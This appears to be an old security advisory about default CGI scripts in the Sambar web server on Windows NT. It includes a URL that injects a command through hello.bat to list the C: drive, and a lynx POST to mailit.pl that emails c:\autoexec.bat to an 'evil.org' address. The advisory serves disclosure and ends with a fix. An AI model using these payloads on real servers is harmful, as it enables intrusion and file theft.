|
Vulnerability Sambar Affected WinNT, 2000 Description Georgi Chorbadzhiyski found following. The default installation of Sambar server, put into server's /CGI-BIN/ directory two .BAT files - ECHO.BAT and HELLO.BAT. These are simple files with just one "echo" command in them. However under Windows NT these files can cause a lot of trouble. The problem IMHO lays in CMD.EXE, the example follows: http://yourdomain/cgi-bin/hello.bat?&dir+c:\ You'll see a nice listing of your C: drive. Sambar server runs with Administrator privileges under NT so even if you use NTFS, you still will be affected. This bug was discovered by Georich Chorbadzhiyski and Nikolay Tsvetkov. This is not the only problem with default CGI's included with sambar 4.2. Try this: echo 'server=smtp.example.com&from=root@example.com&recipient=evil@evil.org&subject=Hi&body=Hello+World%0A&attach=c:\autoexec.bat' | lynx -post_data http://sambar.example.com/cgi-bin/mailit.pl Solution Sambar server running on Windows 95/98 is _NOT_ vulnerable. As a solution delete any .BAT files in /CGI-BIN/ directory of your Sambar server.